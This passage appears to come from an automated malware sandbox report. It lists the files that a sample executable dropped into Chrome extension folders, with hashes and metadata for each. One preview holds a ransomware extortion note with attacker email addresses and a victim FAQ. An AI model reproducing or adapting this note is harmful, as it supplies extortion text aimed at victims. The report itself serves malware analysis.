                  SHA-512:7867FE0C200684B6EB9A7603EE350B8060D719EAEF8F5C99F2A3E364B65F03A09BF7B0C443744387FF1087FC36578867A799139F6451878320734C7D494FF7AF
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\en\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\hr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\nb\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ru\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\sk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\sl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
